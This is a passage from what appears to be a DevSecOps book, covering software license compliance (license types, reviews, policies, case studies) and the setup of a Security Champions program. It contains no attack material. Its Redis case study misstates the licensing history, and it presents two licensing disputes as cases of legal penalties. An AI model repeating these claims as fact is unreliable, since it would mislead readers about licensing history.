• Early detection of vulnerabilities: Identifying security flaws earlier in the development life cycle reduces the time and cost associated with mitigating them later

• Reduced attack surface: Continuous security checks and automated testing decrease the vulnerabilities that can be exploited
• Faster remediation: Immediate feedback and automation enable developers to fix security issues more swiftly
• Cost savings: Addressing vulnerabilities early in the software development process is more cost-effective than dealing with security breaches after deployment
• Improved compliance: Continuous monitoring, logging, and auditing ensure alignment with security standards and regulations
• Increased trust: Customers and stakeholders have greater trust in organizations that prioritize security in their development and deployment processes
• Enhanced collaboration: DevSecOps promotes better collaboration between development, operations, and security teams, fostering a culture where security is everyone’s responsibility
• Scalable security: Automation and integrated security tooling allow security practices to scale with the infrastructure and application complexity
• Reduced downtime: With a proactive approach to security, the likelihood and duration of outages due to security incidents can be reduced
• Secure code practices: Developers become more security-aware, leading to the production of more secure code from the outset
• Continuous improvement: DevSecOps practices promote iterative improvements, ensuring that security practices evolve with emerging threats
• IaC security: Security is also integrated into the provisioning and management of infrastructure, not just the application code
• Integrated toolchain: Seamlessly integrating various security tools into the CI/CD pipeline ensures comprehensive coverage across all stages of development and deployment
• Shared security responsibility: Security is not a siloed responsibility but shared across teams, leading to holistic security practices
• Streamlined operations: With automated security checks and balances, operational workflows become smoother and less error-prone
• Enhanced incident response: A faster and more efficient response to security incidents is provided due to predefined procedures and tighter integration between teams
• Higher release velocity: Secure and automated pipelines allow for faster, more frequent, and more reliable releases
• Continuous monitoring: Real-time monitoring of applications and infrastructure ensures timely detection of and response to any anomalies

• Better risk management: With continuous insight into vulnerabilities and threats, organizations can better manage and mitigate risks
• Security awareness and training: Continuous security integration in the DevOps process enhances awareness and offers regular training opportunities for the team

Summary

In this chapter, we covered DevSecOps as a cultural shift that embeds security into every phase of the development process, emphasizing that security is a shared responsibility across teams. We talked about how we can set up the CI/CD pipeline using open source tools such as Jenkins, GitLab CI/CD, and Travis CI to automate building, testing, and deploying applications, making it easier to incorporate security checks at each stage. We also covered how to implement security controls:
• Importance: They provide early vulnerability detection and continuous security checks, and distribute the security responsibility across the team
• Tools: Various open source tools such as OWASP ZAP, Bandit, Trivy, and Checkov offer vulnerability scanning, configuration management, and more
• Integration: Security controls should be deeply integrated into the DevSecOps pipeline, ensuring timely detection and mitigation of vulnerabilities

Once deployed, the applications and the pipeline itself must be monitored:
• Monitoring tools: Prometheus and Grafana are used for monitoring and visualization, respectively, while tools such as Alertmanager handle alerting
• Continuous compliance: Regular audits, automated compliance checks, and tools such as OpenSCAP ensure constant alignment with security standards
• Incident management: Having a robust incident response plan and tools such as TheHive helps in swiftly managing and mitigating security breaches

The advantages of implementing a DevSecOps program are manifold, including early vulnerability detection, cost savings, improved compliance, increased trust, scalable security, and a shared sense of security responsibility.

In the next chapter, we will discuss license compliance, code coverage, and baseline policies.

Part 5: Governance and an Effective Security Champions Program

Governance covers the major aspects of measuring what is present and what can be fine-tuned. This part has the following chapters:
• Chapter 13, License Compliance, Code Coverage, and Baseline Policies
• Chapter 14, Setting Up a Security Champions Program

Chapter 13: License Compliance, Code Coverage, and Baseline Policies

License compliance is not just a legal necessity but a critical component of software security and DevSecOps. It ensures that software is built on trust, transparency, and ethical practices, which are fundamental for the safe and efficient delivery of software in today’s digital age. License compliance in software security entails adhering to the terms and conditions stipulated in the licensing agreements of software products and components. These licenses can range from open source licenses, such as the GNU General Public License (GPL) or the MIT license, to proprietary licenses issued by software vendors.

License compliance, especially in the domains of software security and DevSecOps, is of paramount importance for various reasons:
• Legal implications: Non-compliance with software licenses can lead to legal repercussions. For businesses, this can result in lawsuits, financial penalties, and reputational damage. DevSecOps practices promote swift software deliveries, and without proper license compliance checks, there’s a risk of inadvertently including non-compliant code.
• Operational risks: Non-compliance can lead to the need to refactor or even completely replace certain components of a software project if it’s determined that they can’t legally be used. This can delay delivery timelines, especially in a DevSecOps environment where continuous integration (CI) and delivery are paramount.
• Transparency and trust: DevSecOps emphasizes collaboration and transparency among teams. Proper license compliance extends this transparency, ensuring all stakeholders (including end users) that the software they’re using, developing, or delivering adheres to legal and ethical standards.
• Vendor relationships: For organizations that use third-party software, license non-compliance can sour relationships with vendors. This could lead to increased costs or even termination of service. In a DevSecOps pipeline, where third-party tools might be integrated for various functions, ensuring that all tools are compliant is crucial.
• Financial implications: Apart from potential legal fines, non-compliance might incur additional costs. For instance, if a proprietary piece of software is used without a proper license, the organization might be liable to pay for its usage, often at a premium.
• Reputation and brand value: In the open source community, trust and reputation are invaluable. Organizations that fail to comply with licensing agreements might find it challenging to collaborate on open source projects or to gain community support. This can hinder innovation and security efforts, especially in a DevSecOps context where community-driven tools and insights are vital.
• Intellectual property protection: Ensuring license compliance protects the intellectual property rights of both the developers and the software providers. It delineates the boundaries of usage, modification, and distribution of software.
• Security assurance: License compliance often entails a thorough review of the software components, which can help in identifying security vulnerabilities and ensuring that the software adheres to the required security standards.

In this chapter, we will take a close look at these topics:
• DevSecOps and its relevance to license compliance
• The distinction between traditional licenses and security implications
• Different types of software licenses
• The impact of software licenses on the DevSecOps pipeline
• How to perform license reviews
• Fine-tuning policies associated with licenses
• Case studies

DevSecOps and its relevance to license compliance

DevSecOps, a fusion of development (Dev), security (Sec), and operations (Ops), is an organizational philosophy that integrates security practices within the DevOps process. DevSecOps aims to create a “security as code” culture with ongoing, flexible collaboration between release engineers and security teams. Let’s look at DevSecOps’ relevance to license compliance:
• Early identification of compliance issues: Integrating license compliance within DevSecOps ensures that compliance issues are identified and addressed early in the development life cycle, reducing the time and cost of rectification

• Automated compliance checks: DevSecOps encourages automation, and automated compliance checks can be integrated within the CI/CD pipeline to ensure continuous adherence to licensing requirements
• Consistent compliance management: With DevSecOps, compliance becomes a part of the routine process rather than an afterthought, ensuring a consistent approach to managing license compliance
• Enhanced communication: DevSecOps fosters better communication between Dev, Ops, and Sec teams, ensuring that everyone is aware of the licensing requirements and compliances
• Educational advancement: Continuous interaction with compliance and security issues educates the team on the importance of license compliance, and helps in better understanding and managing licensing requirements
• Risk mitigation: By ensuring license compliance from the get-go, the risks associated with legal repercussions and security vulnerabilities are significantly mitigated

The distinction between traditional licenses and security implications

The distinction between traditional software licenses and the implications they may have on security can be quite nuanced. When we talk about traditional licenses, we usually refer to proprietary or closed source licenses as opposed to open source licenses. Each type of licensing comes with a set of benefits and challenges concerning software security. The choice between traditional proprietary licenses and open source licenses would largely depend on an organization’s security priorities, resource availability, and long-term strategic goals. In this section, we’ll provide a breakdown of the distinctions and their security implications.

Source code access
• Traditional (proprietary) licenses: Typically, proprietary licenses do not provide access to the source code. Without source code access, identifying vulnerabilities or security flaws is challenging. Users must rely on the vendor to provide security patches and updates.
• Open source licenses: These provide access to the source code to everyone. Having access to the source code allows for community scrutiny, which can lead to early detection and patching of vulnerabilities. However, it also exposes the code to potential malicious actors.

Modification and redistribution
• Traditional (proprietary) licenses: Modification or redistribution of the software is usually prohibited or severely restricted. Restrictions on modification prevent users from patching vulnerabilities on their own, making them reliant on the vendor for security updates.
• Open source licenses: These licenses allow modification and redistribution, promoting collaborative development. The ability to modify the code allows users or communities to address security issues proactively. However, redistributed versions could potentially introduce new vulnerabilities if not properly vetted.

Community oversight
• Traditional (proprietary) licenses: There’s often little to no community oversight due to the closed nature of the source code. Limited oversight could lead to overlooked vulnerabilities and delayed detection and patching of security issues.
• Open source licenses: Open source software promotes community oversight and collaborative security efforts. A larger community working to identify and fix security issues can enhance the security posture of the software, though it also requires a well-coordinated effort to manage and vet contributions.

Vendor dependency
• Traditional (proprietary) licenses: Users depend heavily on the vendor for updates, patches, and support. Vendor dependency can result in slower response times to security incidents and potential misalignment of security priorities between the vendor and the users.
• Open source licenses: There is less vendor dependency, as the community can actively contribute to security improvements. Reduced vendor dependency can lead to quicker responses to security issues, though it may also result in fragmented solutions if the community is not well coordinated.

Cost and resource allocation
• Traditional (proprietary) licenses: Significant costs are usually involved in licensing fees and support contracts. Resource allocation for security measures may be limited by the costs of licensing and support.
• Open source licenses: Usually, there’s a lower cost as no licensing fees are involved. Potentially more resources could be allocated for security measures, though it may also require more internal expertise to manage and secure open source software.

Different types of software licenses

Software licenses are legal agreements that dictate how software can be used, modified, and distributed. They fall into several categories, including proprietary, open source, and freeware licenses. Proprietary licenses are characterized by strict control over the software’s use and distribution, often requiring payment, and typically don’t provide access to the source code. On the other hand, open source licenses can be more permissive, allowing access to the source code, modification, and redistribution, often free of charge. They can further be categorized into permissive licenses such as MIT and Apache, which have minimal restrictions, and copyleft licenses such as GPL and LGPL, which require any derivative work to be distributed under the same open source terms. Freeware licenses allow users to use software for free, but like proprietary software, the source code is not provided, and modifications are not allowed. Each license type has implications for software development, security, and the broader software ecosystem that affect how individuals and organizations interact with the software. The different types of software licenses are as follows:
• Permissive licenses (MIT, Apache)
• Copyleft licenses (GPL, LGPL)
• Proprietary licenses

Let’s take a closer look.

Permissive licenses (MIT, Apache)

Permissive licenses, also known as “liberal” or “free” licenses, are a type of open source license that imposes minimal restrictions on how the software can be used, modified, and shared. Key examples include the MIT license and the Apache license:
• Minimal restrictions: They allow for the reuse, modification, and distribution of the software, with very few restrictions
• No copyleft requirement: Unlike copyleft licenses, permissive licenses do not require derivative works to be released under the same license

• Attribution: Generally, the original creators must be credited, but there are minimal other requirements
• Patent rights: Some permissive licenses, such as the Apache license, provide explicit provisions on patent rights, granting a license from the contributors to use their patent claims

Security implications
• Community inspection: The open nature of permissive licenses allows for community inspection and collaboration to identify and fix security vulnerabilities
• Quick adaptation: They allow for quick adaptation and patching of software to address security concerns as there are fewer restrictions on modifications
• No guaranteed security: While they enable community-driven security efforts, permissive licenses do not guarantee security and may require users to actively monitor and address security issues

Copyleft licenses (GPL, LGPL)

Copyleft licenses are a subset of open source licenses that require any modifications or derivative works to be distributed under the same license as the original software:
• Share-alike requirement: They require that modifications or derivative works be released under the same license, promoting free and open software use
• Preservation of freedoms: They aim to ensure that the freedoms to use, study, share, and modify the software are preserved in derivative works
• Strong versus weak copyleft: Some copyleft licenses (for example, GPL) have strong copyleft requirements, while others (for example, LGPL) have weaker copyleft requirements, allowing for more flexibility in how derivative works are licensed

The impact of software redistribution and modifications
• Restrictive redistribution: The share-alike requirement can be restrictive as it mandates how derivative works can be redistributed
• Encouragement of open collaboration: By requiring derivative works to remain open, copyleft licenses encourage open collaboration and the sharing of improvements
• Compatibility issues: The strict licensing terms can lead to compatibility issues with other licenses, complicating software redistribution and integration

Proprietary licenses
• Source code access: Proprietary licenses typically do not provide access to the source code, while open source licenses do
• Modification and redistribution: They often restrict or prohibit the modification, redistribution, and sharing of the software
• Cost: Proprietary licenses usually require payment for use, while open source licenses often do not

Security constraints and obligations
• Dependence on vendors: Users are often dependent on the vendors for security updates and patches
• Limited scrutiny: The closed nature of proprietary software limits community scrutiny, which could potentially delay the identification and remediation of security vulnerabilities
• Security through obscurity: Sometimes, the lack of source code access is seen as a security measure to prevent malicious actors from finding vulnerabilities, although “security through obscurity” is often criticized as ineffective

The impact of software licenses on the DevSecOps pipeline

DevSecOps, a practice that integrates security within the DevOps process, necessitates a comprehensive understanding and management of software licenses to ensure both legal compliance and security. By weaving license management seamlessly into the DevSecOps pipeline, organizations can ensure a streamlined approach to achieving both security and legal compliance. This fusion aids in proactively identifying and mitigating risks, ensuring a robust, secure, and legally compliant software delivery life cycle (SDLC). Incorporating license management into the DevSecOps pipeline can significantly bolster security while ensuring adherence to legal requirements. Here’s how it unfolds:
• Automatic license detection: Tools such as FOSSA, Snyk, WhiteSource, and Black Duck can be integrated within the CI/CD pipeline to automatically detect and track the licenses of software components and dependencies, and check them for vulnerabilities. They can scan code repositories to identify license types and ensure they are compliant with an organization’s policies. Detecting licenses early in the DevSecOps pipeline allows for a proactive approach to managing legal and security risks. For instance, identifying a component with a restrictive license, or one that hasn’t been properly maintained, can mitigate potential legal disputes and security vulnerabilities.

• Enforcement of license policies: By setting up automatic license scanning and enforcement rules within the CI/CD pipeline, non-compliant code can be flagged and blocked so that it isn’t merged into the main code base, ensuring only compliant and secure code is deployed. By monitoring the licenses of dependencies, teams can ensure they are using well-maintained and securely licensed components. This can also aid in identifying and replacing dependencies that have vulnerabilities or are no longer maintained.

Reporting and documentation

Transparent license reporting in DevSecOps helps maintain an auditable record of compliance and security measures. It fosters an environment of accountability and ensures all stakeholders are informed about the licensing landscape of the software. Documented license compliance aids in demonstrating due diligence in adhering to legal and security requirements. It can be instrumental during audits and can help in quickly addressing any license or security-related concerns raised by stakeholders.
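The license enforcement step described above can be sketched as a small gate; the allow/deny lists and the {package: license} mapping are illustrative, and in practice tools such as FOSSA or Black Duck derive this data automatically:

```python
# Minimal license-policy gate: report a violation when a dependency's
# license is forbidden or not yet reviewed. The lists are illustrative.
APPROVED = {"MIT", "Apache-2.0", "BSD-3-Clause"}
FORBIDDEN = {"AGPL-3.0"}

def evaluate(dependencies: dict[str, str]) -> list[str]:
    """Map {package: license} to a list of violation messages."""
    violations = []
    for package, license_id in dependencies.items():
        if license_id in FORBIDDEN:
            violations.append(f"{package}: forbidden license {license_id}")
        elif license_id not in APPROVED:
            violations.append(f"{package}: unreviewed license {license_id}")
    return violations
```

A CI job would run evaluate() over the project's resolved dependencies and exit non-zero on any violation, which is what blocks non-compliant code from being merged.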

How to perform license reviews

License reviews are essential to ensure that the use, modification, and distribution of software and its dependencies comply with specified licensing agreements and do not pose legal or security risks to the organization. License reviews are an ongoing process and should be integrated as a fundamental practice within the DevSecOps pipeline to ensure legal compliance and security in software development and deployment. This section will provide a structured approach to conducting license reviews.

Tools and techniques
• Automated tools such as FOSSA, Black Duck, or WhiteSource (now Mend.io) can scan code bases and identify the licenses of software components and dependencies. These tools can provide a comprehensive view of the licensing landscape, help track license compliance, and flag potential issues.
• Automating the process can significantly expedite the review, ensuring continuous compliance monitoring throughout the development life cycle.
• Despite the efficiency of automated tools, there are instances when a manual review is necessary – for example, when dealing with complex licensing scenarios, ambiguous licensing terms, or when automated tools cannot accurately identify a license.
• Manual reviews should be thorough, conducted by individuals with a solid understanding of software licensing, and should cover all software components and dependencies.

Engaging legal and security teams
• Establish a collaborative approach involving legal, security, and development teams to ensure a comprehensive license review. Each team brings a unique perspective – legal for compliance, security for risk assessment, and development for technical feasibility.
• Regular meetings and communication channels among these teams can foster a better understanding of the licensing implications and ensure aligned objectives.
• Engage the legal team to understand the legal implications of the licenses in use and to address any potential issues proactively.
• The Sec team should assess the security implications of the licenses, especially in the case of open source components, and ensure that the license compliance process does not introduce security vulnerabilities.
• Dev teams should be informed about the licensing requirements and should be prepared to address any licensing issues, which might include replacing non-compliant dependencies.

Documentation and continuous improvement
• Document the findings of the license reviews and actions taken to address any issues, and maintain a repository of approved licenses and software components
• This documentation can be crucial for auditing purposes and for informing future license review processes
• Analyze the efficiency and effectiveness of the license review process regularly and identify areas for improvement
• Stay updated on evolving licensing terms and ensure that the license review process adapts to any changes in the legal or security landscape

Fine-tuning policies associated with licenses

Crafting well-defined license policies and fine-tuning them so that they align with organizational goals and legal and security standards is crucial in managing software licenses effectively. By fine-tuning license policies and establishing clear processes for managing exceptions, organizations can ensure a balanced approach to license management that aligns with legal requirements, security standards, and operational needs. This section breaks down how to fine-tune license policies.

Establishing an organizational standard
• Create a clear list of approved licenses that are permissible for use within the organization. This list should be based on thorough legal and security reviews.
• Equally important is to have a list of forbidden licenses that pose potential legal risks or have security implications that are not acceptable to the organization.
• These guidelines should be easily accessible to all developers and should be incorporated into training and onboarding processes.
• Involve legal and security teams in establishing license guidelines to ensure a balanced and comprehensive approach.
• Assess licenses from a legal standpoint to ensure compliance with external regulations and internal policies.
• Evaluate licenses from a security standpoint to ensure they do not introduce security vulnerabilities and are being managed securely.
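One lightweight way to make such approved/forbidden lists machine-readable is a version-controlled policy file that scanners and review scripts can consume; the file name, schema, and entries below are purely illustrative, not a standard format:

```yaml
# Illustrative license-policy.yml; the schema is ad hoc, not a standard.
approved:
  - MIT
  - Apache-2.0
  - BSD-3-Clause
forbidden:
  - AGPL-3.0        # example: copyleft terms deemed incompatible with distribution plans
review_required:
  - LGPL-2.1        # allowed only with legal sign-off, per the exception process
contacts:
  legal: legal-team@example.com
  security: appsec@example.com
```

Keeping the policy in the repository means changes to it go through the same review and audit trail as code.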

Exception handling
• Establish a clear process for handling exceptions, which could include a review by the legal and Sec teams, risk assessment, and a sign-off process by designated authorities.
• Ensure that the exception process is well documented and transparent and includes an escalation path for addressing concerns or disputes.
• Exceptions to license policies can introduce legal and security risks. It’s imperative to understand and document these risks thoroughly.
• Evaluate the security implications of each exception, considering factors such as the trustworthiness and maintenance of the software, the community around it, and any known vulnerabilities.
• Ensure that any additional risks introduced by an exception are managed and mitigated appropriately, with compensating controls if necessary.
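Keeping exceptions documented and time-bound can itself be automated. Here is a minimal sketch under assumed field names (component, approver, expiry — not a standard schema): an exception is honored only while it names an approver and has not passed its expiry date, which forces periodic re-review:

```python
from datetime import date

# Hypothetical register of approved license-policy exceptions. Each record
# names the component, who signed it off, and an expiry date so that the
# exception is revisited rather than living on indefinitely.
EXCEPTIONS = [
    {"component": "legacy-reporting-lib", "license": "GPL-2.0",
     "approved_by": "legal-team", "expires": date(2025, 6, 30)},
]

def active_exception(component, today):
    """Return the exception record covering `component`, or None if no
    exception exists, it has expired, or it lacks an approver."""
    for exc in EXCEPTIONS:
        if (exc["component"] == component
                and exc.get("approved_by")
                and exc["expires"] >= today):
            return exc
    return None
```

A build gate could then treat a flagged license as acceptable only when `active_exception` returns a record, logging the approver for audit purposes.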

Continuous review and improvement
• Conduct regular reviews of license policies to ensure they remain relevant and effective in light of evolving legal, security, and technological landscapes.
• Engage with external legal and security experts to ensure that license policies are robust and in line with industry best practices.
• Establish a feedback loop with developers, legal, and Sec teams to learn from experiences, address concerns, and continuously improve the license management process.
• Encourage a culture of open communication and learning to ensure that license policies support organizational goals while minimizing risks.

Case studies

There are many case studies of organizations that have faced legal penalties because of license compliance issues. In this section, we’ll look at some examples.

Case study 1 – the Redis licensing change

Redis decided to move from GNU’s Affero General Public License (AGPL) to a new license named “Commons Clause,” which entailed additional restrictions, primarily to counter cloud providers who were profiting from Redis without contributing back. This licensing change sparked a debate within the community, with some members arguing that the new licensing terms were against the open source ethos. Furthermore, there were concerns that the licensing shift could reduce community engagement in vetting and improving the code, potentially allowing security vulnerabilities to go unnoticed, especially within third-party Redis modules.

Case study 2 – Elastic versus AWS licensing drama

To counter AWS’s commercial services based on Elasticsearch, Elastic changed its license from open source to the Server Side Public License (SSPL). This move aimed to restrict cloud providers such as AWS from offering Elasticsearch as a service without purchasing a commercial license. AWS created a new fork of Elasticsearch under the old open source license, which created a bifurcation in the project. This split raised concerns about the continuity and security of both branches. There was unease about which branch would receive more robust security attention and updates, which could potentially leave users of the less-maintained branch vulnerable to security issues.

Summary

As we conclude this chapter on license compliance, code coverage, and baseline policies within the context of software security and DevSecOps, we’ve navigated through the intricacies of software licensing and its critical role in maintaining legal and security standards across the development and deployment life cycle. We began by defining software licenses and emphasizing their importance in the realm of software security, setting the stage for understanding the various types of licenses – ranging from permissive and copyleft to proprietary – and their unique implications on software use and distribution.


When looking at the DevSecOps pipeline, we examined the impact of software licenses, highlighting the necessity of automated license detection and the benefits it brings to security and compliance. Tools such as FOSSA and Black Duck emerged as crucial in identifying and tracking licenses, while collaborative efforts among legal, security, and development teams were underscored as essential for a proactive stance on potential legal and security issues. The discussion on how to perform license reviews provided a practical guide, advocating for a blend of automated tools and manual processes, and stressing the importance of collaborative reviews that integrate the expertise of legal and security professionals.

Furthermore, we delved into fine-tuning policies associated with licenses, illustrating the need for establishing organizational standards for preferred and forbidden licenses, and described a structured approach for exception handling to mitigate associated risks. This chapter was enriched with case studies – such as the Redis licensing change and the Elastic versus AWS licensing drama – each offering real-world insights into the consequences of licensing decisions and underscoring the interplay between open source community dynamics and corporate strategies.

The key takeaways from this chapter are as follows:
• License compliance: This is a non-negotiable aspect of legal and security frameworks in software development
• DevSecOps integration: License management must be seamlessly integrated into DevSecOps practices for effective security and compliance
• Proactive measures: Regular license reviews and the use of automated tools are crucial for the early detection of compliance issues
• Collaboration is key: A collaborative approach can help in finding and fixing problems related to licenses

In the next chapter, we will cover what the Security Champions program is, how to set it up, and how it benefits us.

14

Setting Up a Security Champions Program

Setting up a Security Champions program is a strategic move to weave cybersecurity into the very fabric of your organization’s culture and processes. This initiative involves identifying and empowering select individuals within your teams – our Security Champions – who will carry the torch of security practices within their respective domains. These Champions will be the frontrunners, advocating for secure coding practices, raising awareness of security threats, and ensuring that security is not just a checkbox in the development life cycle but an ongoing commitment.

The program is more than just a set of tasks; it’s a transformative process that requires careful planning, clear communication, and continuous education. By embedding these advocates into the heart of your technical teams, you encourage a proactive stance on security issues, driving the organization’s DevSecOps program to new heights. The Security Champions program is your stepping stone to creating a resilient and security-conscious environment where every stakeholder understands their role in protecting the organization’s digital assets.

The following aspects will be covered as part of this chapter:
• What is the Security Champions program?
• Who should be a Security Champion?
• The top benefits of starting a Security Champions program
• What does a Security Champion do?
• Security Champions program – why do you need it?
• Shared responsibility models
• The roles of different teams
• Buy-in from the executive
• Measuring the effectiveness of the Security Champions program


The Security Champions program

A Security Champions program is essentially an initiative within an organization that aims to identify and train individuals from various development teams to take on the role of a Security Champion. Think of these Champions as the superheroes of cybersecurity within their respective teams. They have a special interest in and knowledge of security, but they are also skilled developers, able to understand and speak the language of coding and application development. Their role in the organization involves doing the following:
• Acting as the main point of contact for security-related questions or issues within their team
• Spreading security awareness and good practices among their team members
• Helping integrate secure coding practices into the software development life cycle (SDLC)
• Liaising between their team and the dedicated security team of the organization, helping both sides understand each other’s needs and constraints
• Assisting in risk assessments and security testing

The program’s purpose is not just to bridge the gap but also to scale security across multiple development teams. The Security Champion is embedded within the development team, which allows them to incorporate security measures proactively and reactively as a part of the development process, rather than as an afterthought. This leads to more secure software and a more streamlined development process.

You know how sometimes in sports, a player understands offense and defense and can help the two sides work together? That’s like a Security Champion in the world of software development. Imagine two groups of people trying to build a sandcastle at the beach. One group is focused on making the sandcastle quickly (these are the developers), while the other group is worried about protecting it from the waves (these are the security folks). The second group would wait until the sandcastle was mostly built and then add a wall of sand around it.
This would sometimes slow down the build process and frustrate the first group. Now, imagine you have a person who understands both sides. They’re part of the first group, but they also care about keeping the sandcastle safe from waves. As the first group is building, this person is there to suggest they build on higher ground or add a wall from the beginning. They can translate the concerns of the second group into a language the first group understands. And they can help the second group understand what the first group is trying to do.

This person is like a Security Champion. They’re a developer who’s also interested in security. They can help the developers and security folks understand each other and work together. They can ensure the developers consider security from the start, so there’s less reworking and frustration later on. Having a Security Champion can help teams build software that’s not just quick, but also safe. And who wouldn’t want that for their sandcastle?

Here are some things to consider when starting a Security Champions program that also shape the organization’s DevSecOps program:
• Creating a knowledge hub within development teams: Consider your development team as a group of eager learners and your Security Champion as the knowledgeable teacher. The Champion helps make the team more independent by sharing critical security knowledge and best practices. It’s like having a classmate who’s good at math and can help everyone else understand complex problems. It’s often more effective to learn from peers, and the same applies to security practices in software development.
• Scaling security through empowerment: Picture your organization as a bustling city. Your Dev team is the citizens, the Ops team is the service providers, and your Sec team is the police force. For every 100 citizens (developers), you might only have one police officer (security professional). The officer can’t be everywhere at once. So, by training and empowering citizen volunteers (Security Champions), you create a force multiplier, allowing security to scale in a non-linear way.
• Personal growth and career advancement: For some developers, being a Security Champion is like having a golden ticket to a new career path. They’re naturally curious about security and want to learn more, not only to make the software they’re working on safer but also to enhance their skills. It’s like someone who loves playing football not just for fun but to eventually join a professional league.
• Embedding security from the start: Imagine building a house. If you only think about security when the house is already built (such as installing a safe door or burglar alarms), it’s more troublesome and often less effective. It’s the same with software development. If security is an afterthought, it can disrupt the process and lead to suboptimal results.
But if you think about security from the design phase itself (such as building a secure room in your house from the beginning), it’s more streamlined and yields better results. Security Champions ensure that security is built in from the start, not bolted on at the end.

The following are things to consider when starting a Security Champions program from a people perspective:
• Understanding team structures: Knowing the dynamics of each team, their workflows, and how they interact with other teams is vital. It will help in identifying the right personnel to act as Security Champions.
• Selecting Champions: Choose Champions who are respected within their teams, have a keen interest in security, and are willing to bridge the gap between security and development.
• Knowledge baseline: Establish a baseline of security knowledge that all Champions should possess. This ensures a uniform approach to security across the organization.

• Training and resources: Provide specialized training for Champions to enhance their security expertise. Ensure they have access to the right tools and resources to promote security within their teams.
• Technologies in use: Have a clear understanding of the technologies used by different teams. This will help in tailoring the security practices to be technology-specific as needed.
• Security as part of the SDLC: Integrate security into the SDLC so that it becomes an integral part of the process rather than an afterthought.
• Current security posture: Assess the current security state of applications and infrastructure. This will serve as a benchmark to measure the impact of the Security Champions program.
• Policy and governance: Establish clear security policies and governance models that Champions are expected to follow and enforce within their teams.
• Communication channels: Set up effective communication channels for Champions to share knowledge, report issues, and collaborate on security-related matters.
• Metrics and key performance indicators (KPIs): Define clear metrics and KPIs to track the performance of Security Champions and the overall health of the DevSecOps program.
• Recognition and incentivization: Acknowledge the extra effort by the Champions and incentivize their contributions to encourage a culture of security.
• Feedback loop: Create a feedback loop where Champions can provide insights to the security team, fostering continuous improvement.
• Incident response planning: Ensure that Security Champions are involved in incident response planning to prepare teams for potential security events.
• Continuous learning: The cybersecurity landscape is ever-changing. Encourage continuous learning and staying updated with the latest security trends and threats.
• Support from leadership: Secure buy-in and continuous support from leadership to ensure that the Security Champions program is prioritized and adequately resourced.
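To make the metrics and KPIs point concrete, here is a small illustrative sketch. The record fields and the two KPIs chosen (share of security findings fixed before release, and mean days to fix) are assumptions for demonstration, not a standard schema; real data would come from your issue tracker:

```python
# Sketch of two possible champion-program KPIs computed from issue data:
# the share of security findings fixed before release, and the mean
# number of days taken to fix a finding.

def kpi_summary(findings):
    """Return (percent fixed pre-release, mean days to fix)."""
    fixed_pre_release = [f for f in findings if f["fixed_before_release"]]
    pct_pre_release = 100.0 * len(fixed_pre_release) / len(findings)
    mean_days_to_fix = sum(f["days_to_fix"] for f in findings) / len(findings)
    return pct_pre_release, mean_days_to_fix

findings = [  # hypothetical data exported from an issue tracker
    {"fixed_before_release": True, "days_to_fix": 3},
    {"fixed_before_release": True, "days_to_fix": 5},
    {"fixed_before_release": False, "days_to_fix": 12},
    {"fixed_before_release": True, "days_to_fix": 4},
]
pct, days = kpi_summary(findings)
print(f"{pct:.0f}% fixed pre-release, {days:.1f} mean days to fix")
```

Tracking such numbers per team, before and after a Champion is embedded, gives leadership an evidence-based view of the program’s impact.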

Structuring your Security Champions program

Think of starting a Security Champions program like hosting a potluck dinner. You wouldn’t just copy the menu from the last successful potluck you attended. Instead, you’d ask your guests about their food preferences and dietary restrictions. The same goes for your Security Champions program – you need to understand the unique needs and challenges of your teams before designing the program.

In this potluck situation, the Security Champions are like the star chefs. They’re part of the guest list, not professional caterers hired for the event. They’re the ones who enjoy cooking and are willing to contribute a dish. It’s usually best if each guest brings their own dish – the same way each development team should ideally have one Security Champion. However, sometimes, a group of guests might collaborate on a single dish – just like some teams might have multiple developers serving as Security Champions. This might create a bit of confusion over who to ask for the recipe, but it also means the cooking load doesn’t fall on just one person’s shoulders.

Think of your Security Champions program as organizing a football team:
• Understand the strengths and weaknesses of your team: Before you can start any program, you need to know what you’re working with. Just like a football coach, you need to understand your team’s current skills, their knowledge gaps, and the challenges they face on the field.
• Choose the right players: Your Security Champions are like the key players in your team. They should be the ones who are not only skilled but are also enthusiastic about security. They’ll be the ones leading the charge on the field.
• Assign roles and positions: Ideally, you should have one Security Champion for each development team – like having one key player for each position on the field. But depending on your team’s structure and size, you might need to adjust. For example, you might have more than one player sharing a position, or one player covering multiple positions.
• Continuous training and practice: Just like in football, constant practice is essential in a Security Champions program. Your Champions need to keep learning and improving their security skills, which means you should provide them with regular training and educational resources.
• Teamwork and coordination: Remember, the goal is not for the Security Champion to tackle all the security issues alone. It’s about working together with the rest of the development team, like a football player coordinating with their teammates to score a goal. The Champion should lead the team in implementing secure practices, but everyone has a role to play.
• Monitor progress and adjust strategies: A good coach keeps track of their team’s performance and adjusts their strategies as needed. In the same way, you should monitor the progress of your Security Champions program, evaluate its effectiveness, and make necessary adjustments to ensure it’s meeting its goals.

Things to remember before setting up the program

Attracting the right people to your program:
• Identify individuals who have a natural interest in security or those who often take initiatives for security enhancements
• Build a program that appeals to individuals who are motivated by career growth, knowledge expansion, or simply contributing more to the team and company
• Promote the program as an opportunity to enhance skills, gain recognition, and be part of critical decision-making processes


Training Security Champions:
• Start with basic training on the importance of security and how it impacts the overall health of the organization
• Introduce them to common security threats and how they can be prevented
• Provide advanced training on secure coding practices, threat modeling, and more
• Consider a continuous training approach with regular updates on the latest security trends and threats

Engaging Security Champions:
• Make Security Champions part of security discussions and decision-making processes
• Encourage them to conduct security awareness sessions for their respective teams
• Involve them in the review of policies and processes related to security

Delegation:
• Delegate tasks that align with the skills and knowledge of the Security Champions
• Avoid delegating tasks that need specialized security expertise, unless the Champion possesses such expertise
• Do not delegate tasks that could potentially expose sensitive or confidential information

Communication:
• Regular communication is key. This can be through meetings, newsletters, or informal chats.
• Keep the team updated on the latest security threats and measures being taken to address them.
• Highlight the achievements of the Security Champions to motivate them and others.

Motivation:
• Provide continuous recognition and rewards for their contributions
• Create a growth path for them to become full-fledged security professionals, if they are interested
• Encourage them to share their experiences and learnings with the larger team to create a culture of security

Who should be a Security Champion?

A Security Champion does not need to start as a security expert. The most important thing is their interest and willingness to learn. Security specifics can be taught and learned over time, with support from the broader security team and the Security Champions network.

First and foremost, a Security Champion needs to have a genuine interest in cybersecurity. They need to be enthusiastic about learning and sharing knowledge in this area.

Development teams are on the frontlines, designing and building the organization’s applications. As such, their primary motivation to participate in a Security Champions program might revolve around the following:
• Knowledge enhancement: The program can serve as a rich platform for developers to enhance their understanding of security principles and secure coding practices. It’s an opportunity to upskill and grow their careers.
